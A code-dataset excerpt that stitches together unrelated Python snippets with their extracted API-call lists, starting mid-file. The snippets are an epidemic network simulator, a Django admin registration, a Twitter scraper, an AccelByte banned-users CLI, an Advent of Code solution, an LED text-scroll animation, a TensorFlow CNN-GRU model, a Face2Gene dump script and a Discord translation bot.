self.data.plot(x = 'days', y = 'exposed', kind = 'line', color = 'yellow', ax = ax)
self.data.plot(x = 'days', y = 'infected', kind = 'line', color = 'blue', ax = ax)
self.data.plot(x = 'days', y = 'severe infected', kind = 'line', color = 'magenta', ax = ax)
self.data.plot(x = 'days', y = 'recovered', kind = 'line', color = 'green', ax = ax)
self.data.plot(x = 'days', y = 'dead', kind = 'line', color = 'brown', ax = ax)
plt.title('link_p: {}; exp0: {}; t_inc: {}; t_inf: {}\n alpha: {}; beta: {}; gamma: {}'.format(simulator.p_link, simulator.exp0,simulator.t_exp,simulator.t_inf,simulator.alfa,simulator.beta,simulator.gamma))
plt.xlabel('Time (days)')
plt.ylabel('Number of nodes')
plt.savefig('./plots/states.png')
	def update_nodes(self,i,simulator): # Update the network nodes (remove the dead nodes and isolate the severely infected ones)
pass
	def get_new_cases(self,i,simulator): # New cases (nodes that the epidemic spreads to in this step)
		# Find the neighbours of the exposed, infected and severely infected nodes
		# Each susceptible neighbour is infected with rate alpha
		# Exposed nodes
n_exp = np.array(np.nonzero(self.states['exposed'])[0])
		# Infected nodes
n_inf = np.array(np.nonzero(self.states['infected'])[0])
		# Severely infected nodes
n_g_inf = np.array(np.nonzero(self.states['severe_infected'])[0])
		# Recovered nodes
n_rec = np.array(np.nonzero(self.states['recovered'])[0])
		# Dead nodes
n_dead = np.array(np.nonzero(self.states['dead'])[0])
new_cases = []
		# Loop over the exposed, infected and severely infected nodes and find their susceptible neighbours, which become exposed with rate alpha
contaggiosi = np.concatenate((n_exp,n_inf,n_g_inf), axis=None)
for x in contaggiosi:
for n in self.g.neighbors(x):
Rand = np.random.random()
				# A neighbour becomes a new exposed case if the random draw passes and it is not already contagious, recovered, dead, or already in the list
if (Rand<simulator.alfa) and (n not in contaggiosi) and (n not in n_rec) and (n not in n_dead) and (n not in new_cases):
new_cases.append(n)
#print(new_cases)
return new_cases
| [
"pandas.DataFrame",
"numpy.count_nonzero",
"numpy.concatenate",
"numpy.copy",
"matplotlib.pyplot.clf",
"numpy.zeros",
"numpy.nonzero",
"numpy.random.random",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.savefig"
] | [((408, 441), 'numpy.zeros', 'np.zeros', (['(simulator.num_nodi, 1)'], {}), '((simulator.num_nodi, 1))\n', (416, 441), True, 'import numpy as np\n'), ((458, 506), 'numpy.zeros', 'np.zeros', (['(simulator.num_nodi, 1)'], {'dtype': 'np.int8'}), '((simulator.num_nodi, 1), dtype=np.int8)\n', (466, 506), True, 'import numpy as np\n'), ((718, 848), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['index', 'days', 'exposed', 'infected', 'severe infected', 'recovered',\n 'dead', 'susceptible', 'total']"}), "(columns=['index', 'days', 'exposed', 'infected',\n 'severe infected', 'recovered', 'dead', 'susceptible', 'total'])\n", (730, 848), True, 'import pandas as pd\n'), ((2123, 2132), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (2130, 2132), True, 'import matplotlib.pyplot as plt\n'), ((2141, 2150), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2148, 2150), True, 'import matplotlib.pyplot as plt\n'), ((2888, 2913), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Time (days)"""'], {}), "('Time (days)')\n", (2898, 2913), True, 'import matplotlib.pyplot as plt\n'), ((2916, 2945), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Number of nodes"""'], {}), "('Number of nodes')\n", (2926, 2945), True, 'import matplotlib.pyplot as plt\n'), ((2948, 2981), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""./plots/states.png"""'], {}), "('./plots/states.png')\n", (2959, 2981), True, 'import matplotlib.pyplot as plt\n'), ((3934, 3984), 'numpy.concatenate', 'np.concatenate', (['(n_exp, n_inf, n_g_inf)'], {'axis': 'None'}), '((n_exp, n_inf, n_g_inf), axis=None)\n', (3948, 3984), True, 'import numpy as np\n'), ((1769, 1809), 'numpy.count_nonzero', 'np.count_nonzero', (["self.states['exposed']"], {}), "(self.states['exposed'])\n", (1785, 1809), True, 'import numpy as np\n'), ((1811, 1852), 'numpy.count_nonzero', 'np.count_nonzero', (["self.states['infected']"], {}), "(self.states['infected'])\n", (1827, 1852), True, 'import numpy as np\n'), ((1856, 1904), 'numpy.count_nonzero', 'np.count_nonzero', (["self.states['severe_infected']"], {}), "(self.states['severe_infected'])\n", (1872, 1904), True, 'import numpy as np\n'), ((1906, 1948), 'numpy.count_nonzero', 'np.count_nonzero', (["self.states['recovered']"], {}), "(self.states['recovered'])\n", (1922, 1948), True, 'import numpy as np\n'), ((1952, 1989), 'numpy.count_nonzero', 'np.count_nonzero', (["self.states['dead']"], {}), "(self.states['dead'])\n", (1968, 1989), True, 'import numpy as np\n'), ((1628, 1649), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1635, 1649), True, 'import numpy as np\n'), ((3409, 3443), 'numpy.nonzero', 'np.nonzero', (["self.states['exposed']"], {}), "(self.states['exposed'])\n", (3419, 3443), True, 'import numpy as np\n'), ((3484, 3519), 'numpy.nonzero', 'np.nonzero', (["self.states['infected']"], {}), "(self.states['infected'])\n", (3494, 3519), True, 'import numpy as np\n'), ((3573, 3615), 'numpy.nonzero', 'np.nonzero', (["self.states['severe_infected']"], {}), "(self.states['severe_infected'])\n", (3583, 3615), True, 'import numpy as np\n'), ((3656, 3692), 'numpy.nonzero', 'np.nonzero', (["self.states['recovered']"], {}), "(self.states['recovered'])\n", (3666, 3692), True, 'import numpy as np\n'), ((3732, 3763), 'numpy.nonzero', 'np.nonzero', (["self.states['dead']"], {}), "(self.states['dead'])\n", (3742, 3763), True, 'import numpy as np\n'), ((4052, 4070), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (4068, 4070), True, 'import numpy as np\n'), ((1184, 1205), 
'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1191, 1205), True, 'import numpy as np\n'), ((1252, 1273), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1259, 1273), True, 'import numpy as np\n'), ((1322, 1343), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1329, 1343), True, 'import numpy as np\n'), ((1398, 1419), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1405, 1419), True, 'import numpy as np\n'), ((1463, 1484), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1470, 1484), True, 'import numpy as np\n'), ((1565, 1586), 'numpy.copy', 'np.copy', (['self.e_state'], {}), '(self.e_state)\n', (1572, 1586), True, 'import numpy as np\n')] |
from django.contrib import admin
# Register your models here.
from .models import shortenedUrl
admin.site.register(shortenedUrl) | [
"django.contrib.admin.site.register"
] | [((97, 130), 'django.contrib.admin.site.register', 'admin.site.register', (['shortenedUrl'], {}), '(shortenedUrl)\n', (116, 130), False, 'from django.contrib import admin\n')] |
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from future import standard_library
import twitter_scraper as twitter_scraper
import json
import codecs
standard_library.install_aliases()
def main():
def build_list(t, tweet_list):
tweet_list.append(
{
"username": t.username,
"retweet": t.retweets,
"tweet": t.text,
"mentions": t.mentions,
"hashtags": t.hashtags,
"date": t.date.__str__()
}
)
return tweet_list
def print_to_file(data, filename):
try:
with codecs.open(filename + '.json', 'a', 'utf-8') as f:
f.write(data)
return True
except BaseException as e:
print(e)
search_term = '@meshivammathur'
search_params = twitter_scraper.scraper.SearchParams().set_username(search_term).set_max_tweets(400)
tweets = twitter_scraper.scraper.Scraper.get_tweets(search_params)
t_list = []
for tweet in tweets:
t_list = build_list(tweet, t_list)
json_data = json.dumps(t_list, indent=4)
print_to_file(json_data, search_term)
if __name__ == '__main__':
main()
| [
"codecs.open",
"twitter_scraper.scraper.Scraper.get_tweets",
"future.standard_library.install_aliases",
"json.dumps",
"twitter_scraper.scraper.SearchParams"
] | [((253, 287), 'future.standard_library.install_aliases', 'standard_library.install_aliases', ([], {}), '()\n', (285, 287), False, 'from future import standard_library\n'), ((1052, 1109), 'twitter_scraper.scraper.Scraper.get_tweets', 'twitter_scraper.scraper.Scraper.get_tweets', (['search_params'], {}), '(search_params)\n', (1094, 1109), True, 'import twitter_scraper as twitter_scraper\n'), ((1211, 1239), 'json.dumps', 'json.dumps', (['t_list'], {'indent': '(4)'}), '(t_list, indent=4)\n', (1221, 1239), False, 'import json\n'), ((731, 776), 'codecs.open', 'codecs.open', (["(filename + '.json')", '"""a"""', '"""utf-8"""'], {}), "(filename + '.json', 'a', 'utf-8')\n", (742, 776), False, 'import codecs\n'), ((954, 992), 'twitter_scraper.scraper.SearchParams', 'twitter_scraper.scraper.SearchParams', ([], {}), '()\n', (990, 992), True, 'import twitter_scraper as twitter_scraper\n')] |
import yaml
import click
from accelbyte_py_sdk.api.iam import admin_get_banned_users_v3
from ._utils import login_as as login_as_internal
@click.command()
@click.argument("active_only", type=bool)
@click.argument("ban_type")
@click.argument("offset", type=int)
@click.argument("limit", type=int)
@click.option("--namespace")
@click.option("--doc", type=bool)
@click.option("--login_as", type=click.Choice(["client", "user"], case_sensitive=False))
def get_banned_users(
active_only,
ban_type,
limit,
offset,
namespace,
doc,
login_as,
):
login_as_internal(login_as)
if doc:
click.echo(admin_get_banned_users_v3.__doc__)
result, error = admin_get_banned_users_v3(
active_only=active_only,
ban_type=ban_type,
offset=offset,
limit=limit,
namespace=namespace,
)
if error:
raise Exception(str(error))
click.echo("Get banned users success.")
click.echo(yaml.safe_dump(result.to_dict()))
| [
"click.argument",
"click.echo",
"click.option",
"click.command",
"click.Choice",
"accelbyte_py_sdk.api.iam.admin_get_banned_users_v3"
] | [((144, 159), 'click.command', 'click.command', ([], {}), '()\n', (157, 159), False, 'import click\n'), ((161, 201), 'click.argument', 'click.argument', (['"""active_only"""'], {'type': 'bool'}), "('active_only', type=bool)\n", (175, 201), False, 'import click\n'), ((203, 229), 'click.argument', 'click.argument', (['"""ban_type"""'], {}), "('ban_type')\n", (217, 229), False, 'import click\n'), ((231, 265), 'click.argument', 'click.argument', (['"""offset"""'], {'type': 'int'}), "('offset', type=int)\n", (245, 265), False, 'import click\n'), ((267, 300), 'click.argument', 'click.argument', (['"""limit"""'], {'type': 'int'}), "('limit', type=int)\n", (281, 300), False, 'import click\n'), ((302, 329), 'click.option', 'click.option', (['"""--namespace"""'], {}), "('--namespace')\n", (314, 329), False, 'import click\n'), ((331, 363), 'click.option', 'click.option', (['"""--doc"""'], {'type': 'bool'}), "('--doc', type=bool)\n", (343, 363), False, 'import click\n'), ((716, 838), 'accelbyte_py_sdk.api.iam.admin_get_banned_users_v3', 'admin_get_banned_users_v3', ([], {'active_only': 'active_only', 'ban_type': 'ban_type', 'offset': 'offset', 'limit': 'limit', 'namespace': 'namespace'}), '(active_only=active_only, ban_type=ban_type,\n offset=offset, limit=limit, namespace=namespace)\n', (741, 838), False, 'from accelbyte_py_sdk.api.iam import admin_get_banned_users_v3\n'), ((936, 975), 'click.echo', 'click.echo', (['"""Get banned users success."""'], {}), "('Get banned users success.')\n", (946, 975), False, 'import click\n'), ((650, 695), 'click.echo', 'click.echo', (['admin_get_banned_users_v3.__doc__'], {}), '(admin_get_banned_users_v3.__doc__)\n', (660, 695), False, 'import click\n'), ((397, 451), 'click.Choice', 'click.Choice', (["['client', 'user']"], {'case_sensitive': '(False)'}), "(['client', 'user'], case_sensitive=False)\n", (409, 451), False, 'import click\n')] |
from aocd import get_data
def part1(a):
return sum(len(l) - len(l.encode('utf-8').decode('unicode_escape')) + 2 for l in a)
def part2(a):
return sum(len(l.encode('unicode_escape').decode('utf-8').replace('"', '\\"')) - len(l) + 2 for l in a)
if __name__ == '__main__':
data = get_data(day=8, year=2015)
inp = data.splitlines()
print(part1(inp))
print(part2(inp))
| [
"aocd.get_data"
] | [((294, 320), 'aocd.get_data', 'get_data', ([], {'day': '(8)', 'year': '(2015)'}), '(day=8, year=2015)\n', (302, 320), False, 'from aocd import get_data\n')] |
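The two list comprehensions in the Day 8 script above do all of the escaping arithmetic: part1 counts code characters minus in-memory characters, part2 counts re-encoded characters minus code characters. Below is a minimal, hypothetical sanity check that is not part of the original script; it assumes the part1 and part2 functions defined above are in scope and uses the four sample literals from the Advent of Code 2015 Day 8 puzzle statement.

# Sample lines exactly as they appear in the puzzle input (raw characters,
# so the backslashes below are escaped for Python source).
samples = ['""', '"abc"', '"aaa\\"aaa"', '"\\x27"']
# 23 code characters vs. 11 in-memory characters.
assert part1(samples) == 12
# 42 re-encoded characters vs. 23 original code characters.
assert part2(samples) == 19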
from adafruit_led_animation.animation import Animation
import adafruit_framebuf
class TextScroll(Animation):
def __init__(self, grid_object, speed, text, color, font_name='font5x8.bin', name=None):
self._text = text
self._font_name = font_name
self._frame = 0
# We're only using the frame buffer for on/off information, not color
self._buffer = bytearray(grid_object.width * grid_object.height)
self._fb = adafruit_framebuf.FrameBuffer(self._buffer, grid_object.width, grid_object.height, buf_format=adafruit_framebuf.MVLSB)
super().__init__(grid_object, speed, color, name=name)
on_cycle_complete_supported = True
def _get_color(self, x, y):
return self.color
def draw(self):
self._fb.fill(0x000000)
self._fb.text(self._text, self.pixel_object.width - self._frame, 0, 0xFFFFFF, font_name=self._font_name)
# Cheating to get the character width
char_width = self._fb._font.font_width
for y in range(self.pixel_object.height):
for x in range(self.pixel_object.width):
self.pixel_object[x, y] = self._get_color(x, y) if self._fb.pixel(x, y) else (0, 0, 0)
self._frame += 1
if self._frame >= len(self._text) * (char_width + 1) + self.pixel_object.width:
# Cycle completes after text scrolls completely out of view on the display
self.cycle_complete = True
self._frame = 0
def reset(self):
self._frame = 0 | [
"adafruit_framebuf.FrameBuffer"
] | [((461, 584), 'adafruit_framebuf.FrameBuffer', 'adafruit_framebuf.FrameBuffer', (['self._buffer', 'grid_object.width', 'grid_object.height'], {'buf_format': 'adafruit_framebuf.MVLSB'}), '(self._buffer, grid_object.width, grid_object.\n height, buf_format=adafruit_framebuf.MVLSB)\n', (490, 584), False, 'import adafruit_framebuf\n')] |
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers, models, activations
from models.cnn_gru.cnn import CNN, Encoder
class CnnGru(tf.keras.Model):
def __init__(self, seq_len):
super().__init__()
self.seq_len = seq_len
self.cnn = CNN()
ip_dims = self.cnn.compute_output_shape((None,None,None,5))[-1]
self.encoder = Encoder(self.cnn,ip_dims)
self.flatten = layers.Flatten()
self.drop = layers.Dropout(0.3)
self.fc1 = layers.Dense(128)
self.fc2 = layers.Dense(4)
def call(self, x, training=False):
x,_ = self.encoder(x)
x = self.flatten(x)
x = self.drop(x,training=training)
x = self.fc1(x)
x = tf.nn.relu(x)
x = self.fc2(x)
return x | [
"models.cnn_gru.cnn.Encoder",
"tensorflow.nn.relu",
"tensorflow.keras.layers.Dropout",
"tensorflow.keras.layers.Dense",
"models.cnn_gru.cnn.CNN",
"tensorflow.keras.layers.Flatten"
] | [((315, 320), 'models.cnn_gru.cnn.CNN', 'CNN', ([], {}), '()\n', (318, 320), False, 'from models.cnn_gru.cnn import CNN, Encoder\n'), ((416, 442), 'models.cnn_gru.cnn.Encoder', 'Encoder', (['self.cnn', 'ip_dims'], {}), '(self.cnn, ip_dims)\n', (423, 442), False, 'from models.cnn_gru.cnn import CNN, Encoder\n'), ((465, 481), 'tensorflow.keras.layers.Flatten', 'layers.Flatten', ([], {}), '()\n', (479, 481), False, 'from tensorflow.keras import layers, models, activations\n'), ((502, 521), 'tensorflow.keras.layers.Dropout', 'layers.Dropout', (['(0.3)'], {}), '(0.3)\n', (516, 521), False, 'from tensorflow.keras import layers, models, activations\n'), ((541, 558), 'tensorflow.keras.layers.Dense', 'layers.Dense', (['(128)'], {}), '(128)\n', (553, 558), False, 'from tensorflow.keras import layers, models, activations\n'), ((578, 593), 'tensorflow.keras.layers.Dense', 'layers.Dense', (['(4)'], {}), '(4)\n', (590, 593), False, 'from tensorflow.keras import layers, models, activations\n'), ((771, 784), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (781, 784), True, 'import tensorflow as tf\n')] |
'''Create an omim mapping based on information from Face2Gene using the
Face2Gene library.'''
from pprint import pprint
import json
from lib.api.face2gene import Face2Gene
from lib.model.config import ConfigManager
config_data = ConfigManager()
f2g_session = Face2Gene(config=config_data)
s_list = f2g_session.browse_all_syndromes()
with open("f2g_library_dump.json", "w") as f2g_dump:
json.dump(s_list, f2g_dump, indent=4)
| [
"lib.api.face2gene.Face2Gene",
"lib.model.config.ConfigManager",
"json.dump"
] | [((232, 247), 'lib.model.config.ConfigManager', 'ConfigManager', ([], {}), '()\n', (245, 247), False, 'from lib.model.config import ConfigManager\n'), ((263, 292), 'lib.api.face2gene.Face2Gene', 'Face2Gene', ([], {'config': 'config_data'}), '(config=config_data)\n', (272, 292), False, 'from lib.api.face2gene import Face2Gene\n'), ((396, 433), 'json.dump', 'json.dump', (['s_list', 'f2g_dump'], {'indent': '(4)'}), '(s_list, f2g_dump, indent=4)\n', (405, 433), False, 'import json\n')] |
from googletrans import LANGUAGES
from googletrans import Translator
translator = Translator()
async def ajuda(message, comandos :dict):
msg = "```\n"
for c in comandos.keys():
msg += comandos[c][1]+'\n'
msg += "```"
await message.channel.send(msg)
async def traduz(message, _):
msg = message.content.strip().lower().split()
if len(msg)<4:
return Exception
cod1 = msg[-1]
cod2 = msg[-2]
if (len(cod1) > 2 and cod1 in list(LANGUAGES.values())):
for k in LANGUAGES.keys():
if LANGUAGES[k] == cod1:
cod1 = k
elif (len(cod1) == 2 and cod1 not in list(LANGUAGES.keys())):
return Exception
if (len(cod2) > 2 and cod2 in list(LANGUAGES.values())):
for k in LANGUAGES.keys():
if LANGUAGES[k] == cod2:
cod2 = k
elif (len(cod2) == 2 and cod2 not in list(LANGUAGES.keys())):
return Exception
msg = ' '.join(msg[1:-2])
out = translator.translate(text=msg, dest=cod1, src=cod2).text
await message.channel.send(out)
async def linguas(message, _):
msg = "```\n"
for k in LANGUAGES.keys():
msg += str(k)+' - '+str(LANGUAGES[k])+'\n'
msg += "```"
await message.channel.send(msg)
| [
"googletrans.LANGUAGES.values",
"googletrans.Translator",
"googletrans.LANGUAGES.keys"
] | [((83, 95), 'googletrans.Translator', 'Translator', ([], {}), '()\n', (93, 95), False, 'from googletrans import Translator\n'), ((1063, 1079), 'googletrans.LANGUAGES.keys', 'LANGUAGES.keys', ([], {}), '()\n', (1077, 1079), False, 'from googletrans import LANGUAGES\n'), ((495, 511), 'googletrans.LANGUAGES.keys', 'LANGUAGES.keys', ([], {}), '()\n', (509, 511), False, 'from googletrans import LANGUAGES\n'), ((721, 737), 'googletrans.LANGUAGES.keys', 'LANGUAGES.keys', ([], {}), '()\n', (735, 737), False, 'from googletrans import LANGUAGES\n'), ((460, 478), 'googletrans.LANGUAGES.values', 'LANGUAGES.values', ([], {}), '()\n', (476, 478), False, 'from googletrans import LANGUAGES\n'), ((686, 704), 'googletrans.LANGUAGES.values', 'LANGUAGES.values', ([], {}), '()\n', (702, 704), False, 'from googletrans import LANGUAGES\n'), ((605, 621), 'googletrans.LANGUAGES.keys', 'LANGUAGES.keys', ([], {}), '()\n', (619, 621), False, 'from googletrans import LANGUAGES\n'), ((831, 847), 'googletrans.LANGUAGES.keys', 'LANGUAGES.keys', ([], {}), '()\n', (845, 847), False, 'from googletrans import LANGUAGES\n')] |